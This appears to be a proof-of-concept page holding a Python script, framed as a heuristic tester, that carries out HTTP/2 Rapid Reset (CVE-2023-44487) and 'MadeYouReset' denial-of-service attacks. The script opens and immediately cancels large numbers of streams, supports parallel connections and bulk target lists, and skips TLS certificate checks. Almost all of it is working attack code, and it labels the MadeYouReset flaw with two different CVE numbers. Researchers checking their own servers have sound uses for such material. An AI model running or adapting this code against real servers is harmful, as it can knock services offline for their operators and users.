4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / main.py PY
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import argparse
import ssl
import socket
import time
from urllib.parse import urlparse
from datetime import datetime
import json
import csv
import random

from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import (
    SettingsAcknowledged, ConnectionTerminated,
    PingAckReceived, WindowUpdated, RemoteSettingsChanged
)
from colorama import Fore, Style, init
init(autoreset=True)

def print_banner():
    banner = f"""
{Fore.CYAN}{Style.BRIGHT}


╔╦╗┌─┐┌┬┐┌─┐╦ ╦┌─┐┬ ┬╦═╗┌─┐┌─┐┌─┐┌┬┐
║║║├─┤ ││├┤ ╚╦╝│ ││ │╠╦╝├┤ └─┐├┤  │ 
╩ ╩┴ ┴─┴┘└─┘ ╩ └─┘└─┘╩╚═└─┘└─┘└─┘ ┴ 
{Style.RESET_ALL}
    """
    print(banner)
    print(f"{Fore.YELLOW}[ HTTP/2 DDoS Heuristic Tester | CVE-2023-44487 & CVE-2025-8671 ]{Style.RESET_ALL}\n")
    print(f"{Fore.WHITE}[ [email protected] | m10sec 2025 ]{Style.RESET_ALL}\n")

def check_http2_support(host, port=443, tls=True, timeout=5.0):
    """Devuelve True si el host negocia HTTP/2 vía ALPN."""
    try:
        raw = socket.create_connection((host, port), timeout=timeout)
        if tls:
            ctx = ssl.create_default_context()
            ctx.set_alpn_protocols(["h2", "http/1.1"])
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
            s = ctx.wrap_socket(raw, server_hostname=host)
            proto = s.selected_alpn_protocol()
            s.close()
            return proto == "h2"
        else:
            raw.close()
            return False
    except Exception:
        return False


class H2Client:
    def __init__(self, host, port, tls=True, server_name=None, timeout=6.0):
        self.host = host
        self.port = port
        self.tls = tls
        self.server_name = server_name or host
        self.timeout = timeout
        self.sock = None
        self.conn = None
        self.metrics = {
            "goaway": 0,
            "goaway_codes": [],
            "rst_sent": 0,
            "rst_rate_per_s": 0.0,
            "streams_opened": 0,
            "pings": 0,
            "ping_rtt_ms": [],
            "remote_max_concurrent_streams": None,
            "throttled": False,
            "errors": []
        }

    def _wrap_tls(self, raw):
        ctx = ssl.create_default_context()
        # admitir h2 y http/1.1 para mayor compatibilidad en negociación
        ctx.set_alpn_protocols(["h2", "http/1.1"])
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        return ctx.wrap_socket(raw, server_hostname=self.server_name)

    def connect(self):
        try:
            raw = socket.create_connection((self.host, self.port), timeout=self.timeout)
            self.sock = self._wrap_tls(raw) if self.tls else raw
            self.sock.settimeout(self.timeout)
            cfg = H2Configuration(client_side=True, header_encoding="utf-8")
            self.conn = H2Connection(config=cfg)
            self.conn.initiate_connection()
            self._send(self.conn.data_to_send())
            # leer cualquier respuesta inicial (SETTINGS)
            self._drain(0.2)
        except Exception as e:
            raise RuntimeError(f"Error conectando a {self.host}:{self.port} -> {e}")

    def close(self):
        try:
            if self.sock:
                self.sock.close()
        except Exception:
            pass

    def _send(self, data: bytes):
        if not data:
            return
        try:
            self.sock.sendall(data)
        except Exception as e:
            self.metrics["errors"].append(f"send_err:{e}")

    def _drain(self, dur=0.01):
        """Lee y procesa eventos H2 durante 'dur' segundos (aprox)."""
        end = time.time() + dur
        while time.time() < end:
            try:
                data = self.sock.recv(65535)
                if not data:
                    break
                events = self.conn.receive_data(data)
                for ev in events:
                    if isinstance(ev, ConnectionTerminated):
                        self.metrics["goaway"] += 1
                        # ev.error_code puede existir o no; protegemos
                        try:
                            self.metrics["goaway_codes"].append(ev.error_code)
                            if ev.error_code in (0xb, 0x1):  # ENHANCE_YOUR_CALM / PROTOCOL_ERROR
                                self.metrics["throttled"] = True
                        except Exception:
                            pass
                    elif isinstance(ev, RemoteSettingsChanged):
                        # changed_settings es un dict: code -> SettingChanged
                        try:
                            for code, s in ev.changed_settings.items():
                                # SETTINGS_MAX_CONCURRENT_STREAMS = 0x3 / 3
                                if code == 0x3 or code == 3:
                                    # s tiene atributo new_value
                                    self.metrics["remote_max_concurrent_streams"] = getattr(s, "new_value", None)
                        except Exception:
                            pass
                    elif isinstance(ev, PingAckReceived):
                        try:
                            sent_ns = int.from_bytes(ev.ping_data, "big")
                            rtt_ms = (time.time_ns() - sent_ns) / 1e6
                            self.metrics["ping_rtt_ms"].append(rtt_ms)
                        except Exception:
                            self.metrics["ping_rtt_ms"].append(-1)
                # enviar cualquier frame que la librería genere (ACKs, etc)
                self._send(self.conn.data_to_send())
            except socket.timeout:
                break
            except Exception as e:
                self.metrics["errors"].append(str(e))
                break

    def ping(self):
        """Usa H2Connection.ping para obtener los bytes que hay que enviar."""
        try:
            opaque = int(time.time_ns()).to_bytes(8, "big")
            payload = self.conn.ping(opaque)
            self._send(payload)
            self.metrics["pings"] += 1
            # vaciar y esperar ack corto
            self._drain(0.25)
        except Exception as e:
            self.metrics["errors"].append(f"ping_err:{e}")

    def rapid_reset(self, authority, path="/", n_streams=100, header_extra=None, pace_s=0.0):
        """CVE-2023-44487 baseline: abre streams y los resetea inmediatamente."""
        headers_base = [
            (":method", "GET"),
            (":authority", authority),
            (":scheme", "https" if self.tls else "http"),
            (":path", path),
            ("user-agent", "h2-check/rr")
        ]
        if header_extra:
            headers_base.extend(header_extra)

        start = time.time()
        for _ in range(n_streams):
            try:
                sid = self.conn.get_next_available_stream_id()
                # end_stream=True para simular petición completa y después resetear
                self.conn.send_headers(sid, headers_base, end_stream=True)
                # resetear rápido
                self.conn.reset_stream(sid, error_code=0x8)  # CANCEL
                self._send(self.conn.data_to_send())
                self.metrics["rst_sent"] += 1
                self.metrics["streams_opened"] += 1
                self._drain(0.0)
                if pace_s:
                    time.sleep(pace_s)
            except Exception as e:
                self.metrics["errors"].append(f"rapid_err:{e}")
                break
        dur = max(0.001, time.time() - start)
        self.metrics["rst_rate_per_s"] = self.metrics["rst_sent"] / dur
        self._drain(0.5)

    def made_you_reset_variation(self, authority, path="/", n_streams=100, jitter_ms=2):
        """CVE-2025-25063 heurística: HEADERS end_stream=False + pequeño jitter y RST."""
        headers_base = [
            (":method", "GET"),
            (":authority", authority),
            (":scheme", "https" if self.tls else "http"),
            (":path", path),
            ("user-agent", "h2-check/myr")
        ]
        start = time.time()
        for i in range(n_streams):
            try:
                sid = self.conn.get_next_available_stream_id()
                # Enviamos HEADERS sin finalizar stream (end_stream=False)
                self.conn.send_headers(sid, headers_base, end_stream=False)
                self._send(self.conn.data_to_send())
                # jitter pequeño antes del RESET
                time.sleep(random.uniform(0, jitter_ms/1000.0))
                self.conn.reset_stream(sid, error_code=0x8)
                self._send(self.conn.data_to_send())
                self.metrics["rst_sent"] += 1
                self.metrics["streams_opened"] += 1
                if i % 20 == 0:
                    # pedimos ping para medir RTT y hacer ruido
                    self.ping()
                self._drain(0.0)
            except Exception as e:
                self.metrics["errors"].append(f"myr_err:{e}")
                break
        dur = max(0.001, time.time() - start)
        self.metrics["rst_rate_per_s"] = self.metrics["rst_sent"] / dur
        self._drain(0.8)

def classify(metrics):
    go_enhance = any(code == 0xb for code in metrics["goaway_codes"])
    high_rate = metrics["rst_rate_per_s"] > 500
    no_limits = (metrics["remote_max_concurrent_streams"] in (None, 0) or
                 (isinstance(metrics["remote_max_concurrent_streams"], int) and metrics["remote_max_concurrent_streams"] > 1000))
    rtt_spikes = any(rtt > 200 for rtt in metrics["ping_rtt_ms"] if rtt >= 0)

    if not metrics["goaway"] and no_limits and high_rate and rtt_spikes:
        verdict = "LIKELY_VULN"
    elif not go_enhance and (high_rate or no_limits):
        verdict = "POSSIBLE"
    else:
        verdict = "UNLIKELY"
    return verdict

def scan_for_vulnerability(target_url, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0):
    """Devuelve un dict estilo resumen con soporte HTTP/2 y veredicto heurístico."""
    u = urlparse(target_url)
    tls = (u.scheme == "https")
    port = u.port or (443 if tls else 80)
    authority = u.netloc.split(":")[0] or u.path  # fallback si se pasa solo host

    http2_supported = check_http2_support(authority, port=port, tls=tls, timeout=timeout)

    result = {
        "Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
        "URL": target_url,
        "HTTP/2 Support": "Yes" if http2_supported else "No",
        "Vulnerable": "UNKNOWN",
        "Details": "No se pudo completar el análisis"
    }

    if not http2_supported:
        result["Details"] = "El servidor no negoció HTTP/2 (ALPN)."
        return result

    c = H2Client(authority, port, tls=tls, server_name=authority, timeout=timeout)
    try:
        c.connect()
        if mode in ("rapid", "both"):
            c.rapid_reset(authority, path=u.path or "/", n_streams=streams, pace_s=pace)
        if mode in ("myr", "both"):
            c.made_you_reset_variation(authority, path=u.path or "/", n_streams=streams, jitter_ms=jitter)
        verdict = classify(c.metrics)
        mapping = {"LIKELY_VULN": "LIKELY", "POSSIBLE": "POSSIBLE", "UNLIKELY": "UNLIKELY"}
        result["Vulnerable"] = mapping.get(verdict, verdict)
        result["Details"] = (
            f"streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} "
            f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} "
            f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']} "
            f"errors={len(c.metrics['errors'])}"
        )
    except Exception as e:
        result["Vulnerable"] = "UNKNOWN"
        result["Details"] = f"Error durante prueba: {e}"
    finally:
        c.close()

    return result

def _normalize_target(s: str) -> str:
    s = (s or "").strip()
    if not s:
        return s
    if not s.startswith("http"):
        s = "https://" + s
    return s

def interactive_menu():
    print("\n=== HTTP/2 DDoS Heuristic Tester ===")
    print("1) CVE-2023-44487 (Rapid Reset)")
    print("2) CVE-2025-25063 (MadeYouReset)")
    print("3) Ambos (comparativa)")
    print("4) Salir")
    choice = input("Selecciona opción [1-4]: ").strip() or "2"
    if choice not in {"1","2","3"}:
        print("Saliendo.")
        return

    target = _normalize_target(input("Target (https://dominio o http://ip): ").strip())
    if not target:
        print("No se ingresó target. Bye Bye sweet hearth.")
        return

    try:
        streams = int((input("Streams por conexión [200]: ") or "200").strip())
    except Exception:
        streams = 200
    try:
        jitter = int((input("Jitter ms (solo MYR) [2]: ") or "2").strip())
    except Exception:
        jitter = 2

    mode = "rapid" if choice == "1" else ("myr" if choice == "2" else "both")
    summary = scan_for_vulnerability(target, mode=mode, streams=streams, jitter=jitter)
    print(json.dumps(summary, ensure_ascii=False, indent=2))

def bulk_scan_from_txt(path, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0,
                        out_json=None, out_csv=None, line_by_line=True):
    results = []
    try:
        with open(path, "r", encoding="utf-8") as f:
            lines = [ln.strip() for ln in f if ln.strip() and not ln.strip().startswith("#")]
    except Exception as e:
        print(f"[!] No pude leer '{path}': {e}")
        return

    for target in lines:
        target_url = _normalize_target(target)
        try:
            res = scan_for_vulnerability(target_url, mode=mode, streams=streams,
                                         timeout=timeout, jitter=jitter, pace=pace)
        except Exception as e:
            res = {
                "Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
                "URL": target_url,
                "HTTP/2 Support": "UNKNOWN",
                "Vulnerable": "UNKNOWN",
                "Details": f"Error general: {e}"
            }
        results.append(res)
        if line_by_line:
            print(json.dumps(res, ensure_ascii=False))

    if out_json:
        try:
            with open(out_json, "w", encoding="utf-8") as jf:
                json.dump(results, jf, ensure_ascii=False, indent=2)
            print(f"[+] Guardado JSON en {out_json}")
        except Exception as e:
            print(f"[!] No pude guardar JSON en {out_json}: {e}")

    if out_csv:
        try:
            with open(out_csv, "w", encoding="utf-8", newline="") as cf:
                writer = csv.DictWriter(cf, fieldnames=["Timestamp","URL","HTTP/2 Support","Vulnerable","Details"])
                writer.writeheader()
                for r in results:
                    writer.writerow(r)
            print(f"[+] Guardado CSV en {out_csv}")
        except Exception as e:
            print(f"[!] No pude guardar CSV en {out_csv}: {e}")

# -----------------------------
# Punto de entrada
# -----------------------------
def main():
    print_banner()

    ap = argparse.ArgumentParser(description="HTTP/2 MadeYouReset heuristic checker")
    ap.add_argument("target", nargs="?", help="URL objetivo, p.ej. https://example.com (opcional si usas --menu o --targets-file)")
    ap.add_argument("--path", default="/", help="Ruta a solicitar")
    ap.add_argument("--mode", choices=["rapid", "myr", "both"], default="myr",
                    help="Prueba: rapid (CVE-2023-44487), myr (CVE-2025-25063), both")
    ap.add_argument("--conns", type=int, default=1, help="Conexiones paralelas")
    ap.add_argument("--streams", type=int, default=200, help="Streams por conexión")
    ap.add_argument("--timeout", type=float, default=6.0, help="Timeout socket")
    ap.add_argument("--pace", type=float, default=0.0, help="Pausa entre streams (rapid)")
    ap.add_argument("--jitter", type=int, default=2, help="Jitter ms (myr)")
    ap.add_argument("--json", action="store_true", help="Salida JSON resumida (scan_for_vulnerability)")
    ap.add_argument("--menu", action="store_true", help="Abrir menú interactivo")
    ap.add_argument("--targets-file", help="Ruta a TXT con un target por línea (modo bulk)")
    ap.add_argument("--out-json", help="Guardar resultados bulk en archivo JSON")
    ap.add_argument("--out-csv", help="Guardar resultados bulk en archivo CSV")
    args = ap.parse_args()

    # Bulk
    if args.targets_file:
        bulk_scan_from_txt(
            args.targets_file,
            mode=args.mode,
            streams=args.streams,
            timeout=args.timeout,
            jitter=args.jitter,
            pace=args.pace,
            out_json=args.out_json,
            out_csv=args.out_csv,
            line_by_line=True,
        )
        return

    # menu o falta target
    if args.menu or not args.target:
        interactive_menu()
        return

    # normalizar target si el usuario no incluye scheme
    args.target = _normalize_target(args.target)
    u = urlparse(args.target)
    tls = (u.scheme == "https")
    port = u.port or (443 if tls else 80)
    authority = u.netloc.split(":")[0]

    if args.json:
        summary = scan_for_vulnerability(
            args.target,
            mode=args.mode,
            streams=args.streams,
            timeout=args.timeout,
            jitter=args.jitter,
            pace=args.pace
        )
        print(json.dumps(summary, ensure_ascii=False, indent=2))
        return

    clients = []
    try:
        for _ in range(args.conns):
            c = H2Client(authority, port, tls=tls, server_name=authority, timeout=args.timeout)
            try:
                c.connect()
                clients.append(c)
            except Exception as e:
                print(f"[!] No pude crear cliente para {authority}:{port} -> {e}")

        if not clients:
            print("[!] No se pudo establecer ninguna conexión H2. Saliendo.")
            return

        for c in clients:
            if args.mode in ("rapid", "both"):
                c.rapid_reset(authority, path=args.path, n_streams=args.streams, pace_s=args.pace)
            if args.mode in ("myr", "both"):
                c.made_you_reset_variation(authority, path=args.path, n_streams=args.streams, jitter_ms=args.jitter)

        print("\n=== Resultados ===")
        for i, c in enumerate(clients, 1):
            v = classify(c.metrics)
            print(f"[Conn {i}] verdict={v} streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} "
                  f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} "
                  f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']} "
                  f"rtt_ms={','.join(f'{x:.0f}' if x>=0 else '-' for x in c.metrics['ping_rtt_ms'])} "
                  f"errors={len(c.metrics['errors'])}")
    finally:
        for c in clients:
            c.close()


if __name__ == "__main__":
    main()